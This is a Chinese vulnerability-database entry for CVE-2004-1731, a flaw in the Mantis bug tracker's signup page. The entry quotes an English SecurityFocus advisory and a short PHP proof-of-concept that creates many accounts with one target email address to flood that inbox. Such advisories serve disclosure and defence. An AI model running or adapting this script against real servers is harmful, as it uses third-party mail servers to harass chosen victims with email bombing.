Mantis New Account Signup Mass Emailing漏洞

Mantis New Account Signup Mass Emailing漏洞

漏洞ID 1108128 漏洞类型 设计错误
发布时间 2004-08-21 更新时间 2005-10-20
图片[1]-Mantis New Account Signup Mass Emailing漏洞-安全小百科CVE编号 CVE-2004-1731
图片[2]-Mantis New Account Signup Mass Emailing漏洞-安全小百科CNNVD-ID CNNVD-200408-209
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-209
|漏洞详情
Mantisbugtracker的signup_page.php存在漏洞。远程攻击者通过创建多个用户和提供相同电子邮件地址来发送电子邮件炸弹。
|漏洞EXP
source: http://www.securityfocus.com/bid/10995/info

Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks.

When a new user signs up to Mantis, the system automatically sends an email message to the given email address. This email contains the users new password for the affected Mantis bug tracking system.

Mantis fails to ensure that only one account exists with the specified email address, and therefor an attacker can create a massive amount of email, directed at any target they wish. This email will originate from the Mantis server, and not the attacker.

The vendor has implemented a captcha system for new account signup requests in the CVS version of the software. All currently released versions of the software are reported vulnerable. 

<?php

//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://www.example.com";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $in");
$user = "$base_user$i";
echo("New user is $usern");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $urln");
$fd = fopen($url,"r");
echo("E-mail $i sendedn");
fclose($fd);
}

?>
|参考资料

来源:XF
名称:mantis-improper-account-validation(17093)
链接:http://xforce.iss.net/xforce/xfdb/17093
来源:BID
名称:10995
链接:http://www.securityfocus.com/bid/10995
来源:BUGTRAQ
名称:20040820MultipleVulnerabilitiesinMantisBugtracker
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109312225727345&w;=2

相关推荐: Fuzz Insecure Temporary File Creation Vulnerability

Fuzz Insecure Temporary File Creation Vulnerability 漏洞ID 1100405 漏洞类型 Access Validation Error 发布时间 2003-05-07 更新时间 2003-05-07 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享